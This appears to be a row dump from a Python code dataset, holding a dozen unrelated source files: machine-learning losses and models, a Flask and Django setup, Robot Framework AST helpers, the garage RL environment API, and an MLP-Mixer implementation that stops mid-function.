id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
1858467 | from .staggered_grid import StaggeredGrid, unstack_staggered_tensor
from .grid import CenteredGrid
from phi import math
from phi import geom
def staggered_grid(tensor, name='manta_staggered'):
tensor = tensor[...,::-1] # manta: xyz, phiflow: zyx
assert math.staticshape(tensor)[-1] == math.spatial_rank(tensor)
return StaggeredGrid(tensor, name=name)
def centered_grid(tensor, name='manta_centered', crop_valid=False):
if crop_valid:
tensor = tensor[(slice(None),) + (slice(-1),) * math.spatial_rank(tensor) + (slice(None),)]
return CenteredGrid(tensor, name=name)
| StarcoderdataPython |
138731 | <gh_stars>100-1000
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Created by: <NAME>
# Email: <EMAIL>
# Copyright (c) 2019
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
"""Calculate Multi-label Loss (Semantic Loss)"""
import torch
from torch.nn.modules.loss import _Loss
torch_ver = torch.__version__[:3]
__all__ = ['EdgeDetectionReweightedLosses', 'EdgeDetectionReweightedLosses_CPU']
class WeightedCrossEntropyWithLogits(_Loss):
def __init__(self, weight=None, size_average=None, reduce=None, reduction='elementwise_mean'):
super(WeightedCrossEntropyWithLogits, self).__init__(size_average, reduce, reduction)
def forward(self, inputs, targets):
loss_total = 0
for i in range(targets.size(0)): # iterate for batch size
pred = inputs[i]
target = targets[i]
pad_mask = target[0,:,:]
target = target[1:,:,:]
target_nopad = torch.mul(target, pad_mask) # zero out the padding area
num_pos = torch.sum(target_nopad) # true positive number
num_total = torch.sum(pad_mask) # true total number
num_neg = num_total - num_pos
pos_weight = (num_neg / num_pos).clamp(min=1, max=num_total) # compute a pos_weight for each image
max_val = (-pred).clamp(min=0)
log_weight = 1 + (pos_weight - 1) * target
loss = pred - pred * target + log_weight * (max_val + ((-max_val).exp() + (-pred - max_val).exp()).log())
loss = loss * pad_mask
loss = loss.mean()
loss_total = loss_total + loss
loss_total = loss_total / targets.size(0)
return loss_total
class EdgeDetectionReweightedLosses(WeightedCrossEntropyWithLogits):
"""docstring for EdgeDetectionReweightedLosses"""
def __init__(self, weight=None, side5_weight=1, fuse_weight=1):
super(EdgeDetectionReweightedLosses, self).__init__(weight=weight)
self.side5_weight = side5_weight
self.fuse_weight = fuse_weight
def forward(self, *inputs):
side5, fuse, target = tuple(inputs)
loss_side5 = super(EdgeDetectionReweightedLosses, self).forward(side5, target)
loss_fuse = super(EdgeDetectionReweightedLosses, self).forward(fuse, target)
loss = loss_side5 * self.side5_weight + loss_fuse * self.fuse_weight
return loss
class EdgeDetectionReweightedLosses_CPU(WeightedCrossEntropyWithLogits):
"""docstring for EdgeDetectionReweightedLosses"""
"""CPU version used to dubug"""
def __init__(self, weight=None, side5_weight=1, fuse_weight=1):
super(EdgeDetectionReweightedLosses_CPU, self).__init__(weight=weight)
self.side5_weight = side5_weight
self.fuse_weight = fuse_weight
def forward(self, *inputs):
pred, target = tuple(inputs)
loss_side5 = super(EdgeDetectionReweightedLosses_CPU, self).forward(pred[0], target)
loss_fuse = super(EdgeDetectionReweightedLosses_CPU, self).forward(pred[1], target)
loss = loss_side5 * self.side5_weight + loss_fuse * self.fuse_weight
return loss
| StarcoderdataPython |
3513599 | #{
#Driver Code Starts
#Initial Template for Python 3
# } Driver Code Ends
#User function Template for python3
def logical(a,b):
print( a and b) ## do a and b
print(a or b) ## do a or b
print(not a) ## do not a
#{
#Driver Code Starts.
def main():
testcases=int(input()) #testcases
while(testcases>0):
a=int(input())
b=int(input())
logical(a,b)
testcases-=1
if __name__=='__main__':
main()
#} Driver Code Ends | StarcoderdataPython |
3510434 | import os
from flask import Flask
from flask_bcrypt import Bcrypt
from flask_sqlalchemy import SQLAlchemy
from application import constants
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + constants.LOCAL_SQLITE_FILENAME
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
bcrypt = Bcrypt(app)
from application.models import User # noqa
if os.environ.get('FLASK_ENV') == 'development' and not os.path.isfile(constants.LOCAL_SQLITE_FILENAME):
db.create_all()
| StarcoderdataPython |
4863112 | <reponame>zhanghao001122/study
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import json
import xlwt
#from ansible.plugins.callback import CallbackBase
#from ansible.parsing.dataloader import DataLoader
#from ansible.vars.manager import VariableManager
#from ansible.inventory.manager import InventoryManager
#from ansible.playbook.play import Play
#from ansible.executor.task_queue_manager import TaskQueueManager
#from collections import namedtuple
'''
#实例化解析yml
loader = DataLoader()
#实例化资产管理
inventory = InventoryManager(loader=loader,sources='hosts')
#实例化变量管理
variable_manager = VariableManager(loader=loader,inventory=inventory)
Options = namedtuple('Options',
['connection',
'remote_user',
'ask_sudo_pass',
'verbosity',
'ack_pass',
'module_path',
'forks',
'become',
'become_method',
'become_user',
'check',
'listhosts',
'listtasks',
'listtags',
'syntax',
'sudo_user',
'sudo',
'diff'])
options = Options(connection='smart',
remote_user=None,
ack_pass=None,
sudo_user=None,
forks=5,
sudo=None,
ask_sudo_pass=False,
verbosity=5,
module_path=None,
become=None,
become_method=None,
become_user=None,
check=False,
diff=False,
listhosts=None,
listtasks=None,
listtags=None,
syntax=None)
play_source = dict(
hosts = 'all',
gather_facts = 'yes',
tasks = [
dict(action=dict(module='facter', args='')),
# dict(action=dict(module='debug', args=dict(msg='{{shell_out.stdout}}')))
]
)
play = Play().load(play_source, variable_manager=variable_manager, loader=loader)
class ModelResultsCollector(CallbackBase):
def __init__(self, *args, **kwargs):
super(ModelResultsCollector, self).__init__(*args, **kwargs)
self.host_ok = {}
self.host_unreachable = {}
self.host_failed = {}
def v2_runner_on_unreachable(self, result):
self.host_unreachable[result._host.get_name()] = result
def v2_runner_on_ok(self, result):
self.host_ok[result._host.get_name()] = result
def v2_runner_on_failed(self, result):
self.host_failed[result._host.get_name()] = result
callback = ModelResultsCollector()
passwords = dict()
# 传入自定义的callback
tqm = TaskQueueManager(
inventory=inventory,
variable_manager=variable_manager,
loader=loader,
options=options,
passwords=passwords,
stdout_callback=callback,
)
result = tqm.run(play)
# 自定义格式化输出,执行结果数据在result对象的_result属性里
result_raw = {'success':{},'failed':{},'unreachable':{}}
for host,result in callback.host_ok.items():
result_raw['success'][host] = result._result
for host,result in callback.host_failed.items():
result_raw['failed'][host] = result._result
datas = json.dumps(result_raw,indent=4)
'''
json_data = open('json.txt')
datas = json.load(json_data)
json_data.close()
#title = ['hostname','ipaddress_br_ex','ipaddress_br_fw_admin','ipaddress_br_mgmt','ipaddress_br_storage','blockdevices','blockdevice_vda_size','interfaces','memorytotal','physicalprocessorcount','processor0','virtual','bios_vendor','architecture','productname']
title = ['hostname',
'ipaddress_br_ex',
'ipaddress_br_fw_admin',
'ipaddress_br_mgmt',
'ipaddress_br_storage',
'blockdevices',
'blockdevice_sda_size',
'interfaces',
'memorytotal',
'physicalprocessorcount',
'processor0',
'virtual',
'bios_vendor',
'architecture',
'productname']
book = xlwt.Workbook() # 创建一个excel对象
sheet = book.add_sheet(u'云平台节点信息',cell_overwrite_ok=True) # 添加一个sheet页
for i in range(len(title)): # 循环列
sheet.write(0,i,title[i]) # 将title数组中的字段写入到0行i列中
count = 0
for i in datas['success']:#循环列表,取出每一个用户信息
count += 1
host = datas['success'][i]#第i个用户信息
l = []#将列表信息与title匹配的字段顺序输出
for key in title:
try:
l.append(host[key])
except:
l.append('None')
for k1 in range(len(l)): # 循环列表
sheet.write(1+count,k1,l[k1]) # 将信息写入第i+1行第k1列中
book.save('demo.xls')#保存excel
#if __name__ == '__main__':
# writeM()
| StarcoderdataPython |
6697505 | <filename>python/database/createDiseases.py<gh_stars>0
from collections import defaultdict
from nertoolkit.geneontology.GeneOntology import GeneOntology
from database.Neo4JInterface import neo4jInterface
from synonymes.Synonym import Synonym
from synonymes.SynonymUtils import handleCommonExcludeWords
from utils.idutils import dataDir, loadExludeWords, printToFile, speciesName2TaxID
diseaseObo = GeneOntology(dataDir + "miRExplore/doid.obo")
tax2cells = defaultdict(set)
id2node = {}
id2derived_from = defaultdict(set)
for cellID in diseaseObo.dTerms:
oboNode = diseaseObo.dTerms[cellID]
oboID = oboNode.id
oboName = oboNode.name
oboRels = oboNode.is_a
id2node[oboID] = {'id': oboID, 'name': oboName}
if oboRels != None:
for rel in oboRels:
term = rel.term
id2derived_from[oboID].add(term.id)
db = neo4jInterface(simulate=False)
db.deleteRelationship('n', ['DISEASE'], None, 'm', ['DISEASE'], None, ['DISEASE_DERIVED_FROM', None])
db.deleteNode(['DISEASE'], None)
db.createUniquenessConstraint('DISEASE', 'id')
for id in id2node:
node = id2node[id]
db.createNodeIfNotExists(['DISEASE'], node)
for id in id2derived_from:
allDerivatives = id2derived_from[id]
for deriv in allDerivatives:
if not deriv in id2node:
continue
db.createRelationship('disease', ['DISEASE'], {'id': id}, 'other', ['DISEASE'], {'id': deriv}, ['DISEASE_DERIVED_FROM'], None)
db.close() | StarcoderdataPython |
1630823 | # When you create a new test file, make sure to add it here.
# Simply import the class from your file, and then add that class to the '__all__' array.
from game.test_suite.tests.test_example import TestExample
__all__ = [
'TestExample'
] | StarcoderdataPython |
4939138 | import torch
def train(net, data_loader, parameters, device):
net.to(device=device)
net.train()
optimizer = torch.optim.SGD(
net.parameters(),
lr=parameters.get("lr", 0.0001),
momentum=parameters.get("momentum", 0.0),
weight_decay=parameters.get("weight_decay", 0.0),
)
num_epochs = parameters.get("num_epochs", 10)
for epoch in range(1, num_epochs + 1):
epoch_loss = 0.0
for i_batch, sample_batched in enumerate(data_loader):
features = sample_batched["x"].to(device=device)
labels = sample_batched["y"].to(device=device)
optimizer.zero_grad()
outputs = net(features)
loss = torch.nn.CrossEntropyLoss()(outputs, labels)
print("Epoch: ", epoch, "\tstep: ", i_batch, "\tloss: ", loss.item())
epoch_loss += loss.item()
loss.backward()
if "grad_norm" in parameters and parameters["grad_norm"] > 0:
torch.nn.utils.clip_grad_norm_(net.parameters(), parameters["grad_norm"])
optimizer.step()
return epoch_loss
def evaluate(net, data_loader, device):
net.eval()
correct = 0
total = 0
with torch.no_grad():
for i_batch, sample_batched in enumerate(data_loader):
features = sample_batched["x"].to(device=device)
labels = sample_batched["y"].to(device=device)
labels = labels.to(device=device)
outputs = net(features)
_, predicted = torch.max(outputs, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
return correct / total
| StarcoderdataPython |
111360 | from django.db import models
from django.contrib.auth.models import User
class TerminationRequest(models.Model):
"""
When an employee leaves the organization
remove access to the different services that were previously requested
"""
requester = models.ForeignKey(
User, related_name='requested_terminations', on_delete=models.SET_NULL,
blank=True, null=True)
# who is leaving?
user = models.ForeignKey(User, related_name='terminations',
on_delete=models.SET_NULL, blank=True, null=True)
# is it new? approved? completed? denied?
request_status = models.CharField(max_length=50)
# will the employee be coming back at a later date? i.e. seasonal?
returning = models.BooleanField(default=False)
return_date = models.DateField(blank=True, null=True)
requested = models.DateTimeField(auto_now_add=True)
# any associated logged actions could trigger an update to updated
updated = models.DateTimeField(auto_now=True)
# when the account was closed -- job's finished
terminated = models.DateTimeField(blank=True, null=True)
| StarcoderdataPython |
6432642 | <reponame>mardukbp/robotframework-lsp<filename>robotframework-interactive/src/robotframework_interactive/ast_utils.py
import sys
from typing import Iterator, Tuple, Any, Union, Generic, TypeVar
import ast as ast_module
T = TypeVar("T")
Y = TypeVar("Y", covariant=True)
class NodeInfo(Generic[Y]):
stack: tuple
node: Y
__slots__ = ["stack", "node"]
def __init__(self, stack, node):
self.stack = stack
self.node = node
class _NodesProviderVisitor(ast_module.NodeVisitor):
def __init__(self, on_node=lambda node: None):
ast_module.NodeVisitor.__init__(self)
self._stack = []
self.on_node = on_node
def generic_visit(self, node):
self._stack.append(node)
self.on_node(self._stack, node)
ast_module.NodeVisitor.generic_visit(self, node)
self._stack.pop()
class _PrinterVisitor(ast_module.NodeVisitor):
def __init__(self, stream):
ast_module.NodeVisitor.__init__(self)
self._level = 0
self._stream = stream
def _replace_spacing(self, txt):
curr_len = len(txt)
delta = 80 - curr_len
return txt.replace("*SPACING*", " " * delta)
def generic_visit(self, node):
# Note: prints line and col offsets 0-based (even if the ast is 1-based for
# lines and 0-based for columns).
self._level += 1
try:
indent = " " * self._level
node_lineno = node.lineno
if node_lineno != -1:
# Make 0-based
node_lineno -= 1
node_end_lineno = node.end_lineno
if node_end_lineno != -1:
# Make 0-based
node_end_lineno -= 1
self._stream.write(
self._replace_spacing(
"%s%s *SPACING* (%s, %s) -> (%s, %s)\n"
% (
indent,
node.__class__.__name__,
node_lineno,
node.col_offset,
node_end_lineno,
node.end_col_offset,
)
)
)
tokens = getattr(node, "tokens", [])
for token in tokens:
token_lineno = token.lineno
if token_lineno != -1:
# Make 0-based
token_lineno -= 1
self._stream.write(
self._replace_spacing(
"%s- %s, '%s' *SPACING* (%s, %s->%s)\n"
% (
indent,
token.type,
token.value.replace("\n", "\\n").replace("\r", "\\r"),
token_lineno,
token.col_offset,
token.end_col_offset,
)
)
)
ast_module.NodeVisitor.generic_visit(self, node)
finally:
self._level -= 1
def print_ast(node, stream=None):
if stream is None:
stream = sys.stderr
errors_visitor = _PrinterVisitor(stream)
errors_visitor.visit(node)
def _iter_nodes(node, stack=None, recursive=True):
"""
:note: the yielded stack is actually always the same (mutable) list, so,
clients that want to return it somewhere else should create a copy.
"""
if stack is None:
stack = []
for _field, value in ast_module.iter_fields(node):
if isinstance(value, list):
for item in value:
if isinstance(item, ast_module.AST):
yield stack, item
if recursive:
stack.append(item)
for o in _iter_nodes(item, stack, recursive=recursive):
yield o
stack.pop()
elif isinstance(value, ast_module.AST):
if recursive:
yield stack, value
stack.append(value)
for o in _iter_nodes(value, stack, recursive=recursive):
yield o
stack.pop()
def _iter_nodes_filtered(
ast, accept_class: Union[Tuple[str, ...], str], recursive=True
) -> Iterator[Tuple[list, Any]]:
if not isinstance(accept_class, (list, tuple, set)):
accept_class = (accept_class,)
for stack, node in _iter_nodes(ast, recursive=recursive):
if node.__class__.__name__ in accept_class:
yield stack, node
def iter_nodes(
ast, accept_class: Union[Tuple[str, ...], str], recursive=True
) -> Iterator[NodeInfo]:
if not isinstance(accept_class, (list, tuple, set)):
accept_class = (accept_class,)
for stack, node in _iter_nodes(ast, recursive=recursive):
if node.__class__.__name__ in accept_class:
yield NodeInfo(tuple(stack), node)
def iter_all_nodes(ast, recursive=True) -> Iterator[NodeInfo]:
for stack, node in _iter_nodes(ast, recursive=recursive):
yield NodeInfo(tuple(stack), node)
| StarcoderdataPython |
1681814 | """Base Garage Environment API."""
import abc
from dataclasses import dataclass
from typing import Dict
import akro
import numpy as np
# Can't use naive garage import, or Sphinx AutoAPI breaks.
from garage._dtypes import StepType
@dataclass(frozen=True)
class InOutSpec:
"""Describes the input and output spaces of a primitive or module."""
input_space: akro.Space
output_space: akro.Space
@dataclass(frozen=True, init=False)
class EnvSpec(InOutSpec):
"""Describes the observations, actions, and time horizon of an MDP.
Args:
observation_space (akro.Space): The observation space of the env.
action_space (akro.Space): The action space of the env.
max_episode_length (int): The maximum number of steps allowed in an
episode.
"""
def __init__(self,
observation_space,
action_space,
max_episode_length=None):
object.__setattr__(self, 'max_episode_length', max_episode_length)
super().__init__(input_space=action_space,
output_space=observation_space)
max_episode_length: int or None = None
@property
def action_space(self):
"""Get action space.
Returns:
akro.Space: Action space of the env.
"""
return self.input_space
@property
def observation_space(self):
"""Get observation space of the env.
Returns:
akro.Space: Observation space.
"""
return self.output_space
@action_space.setter
def action_space(self, action_space):
"""Set action space of the env.
Args:
action_space (akro.Space): Action space.
"""
self._input_space = action_space
@observation_space.setter
def observation_space(self, observation_space):
"""Set observation space of the env.
Args:
observation_space (akro.Space): Observation space.
"""
self._output_space = observation_space
@dataclass
class EnvStep:
# pylint: disable=missing-return-doc, missing-return-type-doc, missing-param-doc, missing-type-doc # noqa: E501
r"""A tuple representing a single step returned by the environment.
Attributes:
env_spec (EnvSpec): Specification for the environment from
which this data was sampled.
action (numpy.ndarray): A numpy array of shape :math:`(A^*)`
containing the action for the this time step. These must conform
to :obj:`EnvStep.action_space`.
`None` if `step_type` is `StepType.FIRST`, i.e. at the start of a
sequence.
reward (float): A float representing the reward for taking the action
given the observation, at the this time step.
`None` if `step_type` is `StepType.FIRST`, i.e. at the start of a
sequence.
observation (numpy.ndarray): A numpy array of shape :math:`(O^*)`
containing the observation for the this time step in the
environment. These must conform to
:obj:`EnvStep.observation_space`.
The observation after applying the action.
env_info (dict): A dict containing environment state information.
step_type (StepType): a `StepType` enum value. Can either be
StepType.FIRST, StepType.MID, StepType.TERMINAL, StepType.TIMEOUT.
"""
env_spec: EnvSpec
action: np.ndarray
reward: float
observation: np.ndarray
env_info: Dict[str, np.ndarray or dict]
step_type: StepType
@property
def first(self):
"""bool: Whether this `TimeStep` is the first of a sequence."""
return self.step_type is StepType.FIRST
@property
def mid(self):
"""bool: Whether this `TimeStep` is in the mid of a sequence."""
return self.step_type is StepType.MID
@property
def terminal(self):
"""bool: Whether this `TimeStep` records a termination condition."""
return self.step_type is StepType.TERMINAL
@property
def timeout(self):
"""bool: Whether this `TimeStep` records a time out condition."""
return self.step_type is StepType.TIMEOUT
@property
def last(self):
"""bool: Whether this `TimeStep` is the last of a sequence."""
return self.step_type is StepType.TERMINAL or self.step_type \
is StepType.TIMEOUT
class Environment(abc.ABC):
"""The main API for garage environments.
The public API methods are:
+-----------------------+
| Functions |
+=======================+
| reset() |
+-----------------------+
| step() |
+-----------------------+
| render() |
+-----------------------+
| visualize() |
+-----------------------+
| close() |
+-----------------------+
Set the following properties:
+-----------------------+-------------------------------------------------+
| Properties | Description |
+=======================+=================================================+
| action_space | The action space specification |
+-----------------------+-------------------------------------------------+
| observation_space | The observation space specification |
+-----------------------+-------------------------------------------------+
| spec | The environment specifications |
+-----------------------+-------------------------------------------------+
| render_modes | The list of supported render modes |
+-----------------------+-------------------------------------------------+
Example of a simple rollout loop:
.. code-block:: python
env = MyEnv()
policy = MyPolicy()
first_observation, episode_info = env.reset()
env.visualize() # visualization window opened
episode = []
# Determine the first action
first_action = policy.get_action(first_observation, episode_info)
episode.append(env.step(first_action))
while not episode[-1].last():
action = policy.get_action(episode[-1].observation)
episode.append(env.step(action))
env.close() # visualization window closed
Make sure your environment is pickle-able:
Garage pickles the environment via the `cloudpickle` module
to save snapshots of the experiment. However, some environments may
contain attributes that are not pickle-able (e.g. a client-server
connection). In such cases, override `__setstate__()` and
`__getstate__()` to add your custom pickle logic.
You might want to refer to the EzPickle module:
https://github.com/openai/gym/blob/master/gym/utils/ezpickle.py
for a lightweight way of pickle and unpickle via constructor
arguments.
"""
@property
@abc.abstractmethod
def action_space(self):
"""akro.Space: The action space specification."""
@property
@abc.abstractmethod
def observation_space(self):
"""akro.Space: The observation space specification."""
@property
@abc.abstractmethod
def spec(self):
"""EnvSpec: The environment specification."""
@property
@abc.abstractmethod
def render_modes(self):
"""list: A list of string representing the supported render modes.
See render() for a list of modes.
"""
@abc.abstractmethod
def reset(self):
"""Resets the environment.
Returns:
numpy.ndarray: The first observation conforming to
`observation_space`.
dict: The episode-level information.
Note that this is not part of `env_info` provided in `step()`.
It contains information of he entire episode, which could be
needed to determine the first action (e.g. in the case of
goal-conditioned or MTRL.)
"""
@abc.abstractmethod
def step(self, action):
"""Steps the environment with the action and returns a `EnvStep`.
If the environment returned the last `EnvStep` of a sequence (either
of type TERMINAL or TIMEOUT) at the previous step, this call to
`step()` will start a new sequence and `action` will be ignored.
If `spec.max_episode_length` is reached after applying the action
and the environment has not terminated the episode, `step()` should
return a `EnvStep` with `step_type==StepType.TIMEOUT`.
If possible, update the visualization display as well.
Args:
action (object): A NumPy array, or a nested dict, list or tuple
of arrays conforming to `action_space`.
Returns:
EnvStep: The environment step resulting from the action.
Raises:
RuntimeError: if `step()` is called after the environment has been
constructed and `reset()` has not been called.
"""
@abc.abstractmethod
def render(self, mode):
"""Renders the environment.
The set of supported modes varies per environment. By convention,
if mode is:
* rgb_array: Return an `numpy.ndarray` with shape (x, y, 3) and type
uint8, representing RGB values for an x-by-y pixel image, suitable
for turning into a video.
* ansi: Return a string (str) or `StringIO.StringIO` containing a
terminal-style text representation. The text can include newlines
and ANSI escape sequences (e.g. for colors).
Make sure that your class's `render_modes` includes the list of
supported modes.
For example:
.. code-block:: python
class MyEnv(Environment):
def render_modes(self):
return ['rgb_array', 'ansi']
def render(self, mode):
if mode == 'rgb_array':
return np.array(...) # return RGB frame for video
elif mode == 'ansi':
... # return text output
else:
raise ValueError('Supported render modes are {}, but '
'got render mode {} instead.'.format(
self.render_modes, mode))
Args:
mode (str): the mode to render with. The string must be present in
`self.render_modes`.
"""
@abc.abstractmethod
def visualize(self):
"""Creates a visualization of the environment.
This function should be called **only once** after `reset()` to set up
the visualization display. The visualization should be updated
when the environment is changed (i.e. when `step()` is called.)
Calling `close()` will deallocate any resources and close any
windows created by `visualize()`. If `close()` is not explicitly
called, the visualization will be closed when the environment is
destructed (i.e. garbage collected).
"""
@abc.abstractmethod
def close(self):
"""Closes the environment.
This method should close all windows invoked by `visualize()`.
Override this function in your subclass to perform any necessary
cleanup.
Environments will automatically `close()` themselves when they are
garbage collected or when the program exits.
"""
def _validate_render_mode(self, mode):
if mode not in self.render_modes:
raise ValueError('Supported render modes are {}, but '
'got render mode {} instead.'.format(
self.render_modes, mode))
def __del__(self):
"""Environment destructor."""
self.close()
class Wrapper(Environment):
"""A wrapper for an environment that implements the `Environment` API."""
def __init__(self, env):
"""Initializes the wrapper instance.
Args:
env (Environment): The environment to wrap
"""
self._env = env
def __getattr__(self, name):
"""Forward getattr request to wrapped environment.
Args:
name (str): attr (str): attribute name
Returns:
object: the wrapped attribute.
Raises:
AttributeError: if the requested attribute is a private attribute,
or if the requested attribute is not found in the
wrapped environment.
"""
if name.startswith('_'):
raise AttributeError(
"attempted to get missing private attribute '{}'".format(name))
if not hasattr(self._env, name):
raise AttributeError('Attribute {} is not found'.format(name))
return getattr(self._env, name)
@property
def action_space(self):
"""akro.Space: The action space specification."""
return self._env.action_space
@property
def observation_space(self):
"""akro.Space: The observation space specification."""
return self._env.observation_space
@property
def spec(self):
"""EnvSpec: The environment specification."""
return self._env.spec
@property
def render_modes(self):
"""list: A list of string representing the supported render modes."""
return self._env.render_modes
def step(self, action):
"""Step the wrapped env.
Args:
action (np.ndarray): An action provided by the agent.
Returns:
EnvStep: The environment step resulting from the action.
"""
return self._env.step(action)
def reset(self):
"""Reset the wrapped env.
Returns:
numpy.ndarray: The first observation conforming to
`observation_space`.
dict: The episode-level information.
Note that this is not part of `env_info` provided in `step()`.
It contains information of he entire episode, which could be
needed to determine the first action (e.g. in the case of
goal-conditioned or MTRL.)
"""
return self._env.reset()
def render(self, mode):
"""Render the wrapped environment.
Args:
mode (str): the mode to render with. The string must be
present in `self.render_modes`.
Returns:
object: the return value for render, depending on each env.
"""
return self._env.render(mode)
def visualize(self):
"""Creates a visualization of the wrapped environment."""
self._env.visualize()
def close(self):
"""Close the wrapped env."""
self._env.close()
@property
def unwrapped(self):
"""garage.Environment: The inner environment."""
return getattr(self._env, 'unwrapped', self._env)
| StarcoderdataPython |
3453254 | <reponame>haribhutanadhu/PaddleViT
# Copyright (c) 2021 PPViT Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module implements MLP-Mixer
MLP-Mixer: An all-MLP Architecture for Vision
https://arxiv.org/abs/2105.01601
"""
import paddle
import paddle.nn as nn
from droppath import DropPath
class Identity(nn.Layer):
""" Identity layer
The output of this layer is the input without any change.
Use this layer to avoid if condition in some forward methods
"""
def __init__(self):
super(Identity, self).__init__()
def forward(self, x):
return x
class PatchEmbedding(nn.Layer):
"""Patch Embeddings
Apply patch embeddings on input images. Embeddings is implemented using a Conv2D op.
Attributes:
image_size: int, input image size, default: 224
patch_size: int, size of patch, default: 4
in_channels: int, input image channels, default: 3
embed_dim: int, embedding dimension, default: 96
"""
def __init__(self, image_size=224, patch_size=4, in_channels=3, embed_dim=96, norm_layer=None):
super(PatchEmbedding, self).__init__()
image_size = (image_size, image_size)
patch_size = (patch_size, patch_size)
patches_resolution = [image_size[0]//patch_size[0], image_size[1]//patch_size[1]]
self.image_size = image_size
self.patch_size = patch_size
self.patches_resolution = patches_resolution
self.num_patches = patches_resolution[0] * patches_resolution[1]
self.in_channels = in_channels
self.embed_dim = embed_dim
self.patch_embed = nn.Conv2D(in_channels=in_channels,
out_channels=embed_dim,
kernel_size=patch_size,
stride=patch_size)
self.norm = norm_layer if norm_layer is not None else Identity()
def forward(self, x):
x = self.patch_embed(x) # [batch, embed_dim, h, w] h,w = patch_resolution
x = x.flatten(start_axis=2, stop_axis=-1) # [batch, embed_dim, h*w] h*w = num_patches
x = x.transpose([0, 2, 1]) # [batch, h*w, embed_dim]
x = self.norm(x) # [batch, num_patches, embed_dim]
return x
class Mlp(nn.Layer):
""" MLP module
Impl using nn.Linear and activation is GELU, dropout is applied.
Ops: fc -> act -> dropout -> fc -> dropout
Attributes:
fc1: nn.Linear
fc2: nn.Linear
act: GELU
dropout1: dropout after fc1
dropout2: dropout after fc2
"""
def __init__(self, in_features, hidden_features, dropout):
super(Mlp, self).__init__()
w_attr_1, b_attr_1 = self._init_weights()
self.fc1 = nn.Linear(in_features,
hidden_features,
weight_attr=w_attr_1,
bias_attr=b_attr_1)
w_attr_2, b_attr_2 = self._init_weights()
self.fc2 = nn.Linear(hidden_features,
in_features,
weight_attr=w_attr_2,
bias_attr=b_attr_2)
self.act = nn.GELU()
self.dropout = nn.Dropout(dropout)
def _init_weights(self):
weight_attr = paddle.ParamAttr(initializer=paddle.nn.initializer.XavierUniform())
bias_attr = paddle.ParamAttr(initializer=paddle.nn.initializer.Normal(std=1e-6))
return weight_attr, bias_attr
def forward(self, x):
x = self.fc1(x)
x = self.act(x)
x = self.dropout(x)
x = self.fc2(x)
x = self.dropout(x)
return x
class MixerBlock(nn.Layer):
"""Mixer Block
This block implements Mixer layer which contains 2 MLP blocks and residuals.
The 1st is token-mixing MLP, the 2nd is channel-mixing MLP.
Attributes:
mlp_tokens: Mlp layer for token mixing
mlp_channels: Mlp layer for channel mixing
tokens_dim: mlp hidden dim for mlp_tokens
channels_dim: mlp hidden dim for mlp_channels
norm1: nn.LayerNorm, apply before mlp_tokens
norm2: nn.LayerNorm, apply before mlp_channels
"""
def __init__(self, dim, seq_len, mlp_ratio=(0.5, 4.0), dropout=0., droppath=0.):
super(MixerBlock, self).__init__()
tokens_dim = int(mlp_ratio[0] * dim)
channels_dim = int(mlp_ratio[1] * dim)
self.norm1 = nn.LayerNorm(dim, epsilon=1e-6)
self.mlp_tokens = Mlp(seq_len, tokens_dim, dropout=dropout)
self.drop_path = DropPath(droppath)
self.norm2 = nn.LayerNorm(dim, epsilon=1e-6)
self.mlp_channels = Mlp(dim, channels_dim, dropout=dropout)
def forward(self, x):
h = x
x = self.norm1(x)
x = x.transpose([0, 2, 1])
x = self.mlp_tokens(x)
x = x.transpose([0, 2, 1])
x = self.drop_path(x)
x = x + h
h = x
x = self.norm2(x)
x = self.mlp_channels(x)
x = self.drop_path(x)
x = x + h
return x
class MlpMixer(nn.Layer):
"""MlpMixer model
Args:
num_classes: int, num of image classes, default: 1000
image_size: int, input image size, default: 224
in_channels: int, input image channels, default: 3
patch_size: int, patch size, default: 16
num_mixer_layers: int, number of mixer blocks, default: 8
embed_dim: int, output dimension of patch embedding, default: 512
mlp_ratio: tuple(float, float), mlp scales for mlp token and mlp channels,
mlp_tokens hidden dim = mlp_ratio[0] * embed_dim,
mlp_channels hidden dim = mlp_ratio[1] * embed_dim,
default: (0.5, 4.0)
dropout: float, dropout rate for mlp, default: 0.
droppath: float, droppath rate for mixer block, default: 0.
patch_embed_norm: bool, if True, apply norm in patch embedding, default: False
"""
def __init__(self,
num_classes=1000,
image_size=224,
in_channels=3,
patch_size=16,
num_mixer_layers=8,
embed_dim=512,
mlp_ratio=(0.5, 4.0),
dropout=0.,
droppath=0.,
patch_embed_norm=False):
super(MlpMixer, self).__init__()
self.num_classes = num_classes
self.num_features = embed_dim
self.embed_dim = embed_dim
norm_layer = nn.LayerNorm(embed_dim, epsilon=1e-6)
self.patch_embed = PatchEmbedding(
image_size=image_size,
patch_size=patch_size,
in_channels=in_channels,
embed_dim=embed_dim,
norm_layer=norm_layer if patch_embed_norm else None)
self.mixer_layers = nn.Sequential(
*[MixerBlock(embed_dim,
self.patch_embed.num_patches,
mlp_ratio,
dropout,
droppath) for _ in range(num_mixer_layers)])
self.norm = nn.LayerNorm(embed_dim, epsilon=1e-6)
self.head = nn.Linear(embed_dim, self.num_classes)
def forward_features(self, x):
x = self.patch_embed(x)
x = self.mixer_layers(x)
x = self.norm(x)
x = x.mean(axis=1)
return x
def forward(self, x):
x = self.forward_features(x)
x = self.head(x)
return x
def build_mlp_mixer(config):
"""Build mlp mixer by reading options in config object
Args:
config: config instance contains setting options
Returns:
model: MlpMixer model
"""
model = MlpMixer(num_classes=config.MODEL.NUM_CLASSES,
image_size=config.DATA.IMAGE_SIZE,
in_channels=3,
num_mixer_layers=config.MODEL.MIXER.NUM_LAYERS,
embed_dim=config.MODEL.MIXER.HIDDEN_SIZE,
mlp_ratio=(0.5, 4.0),
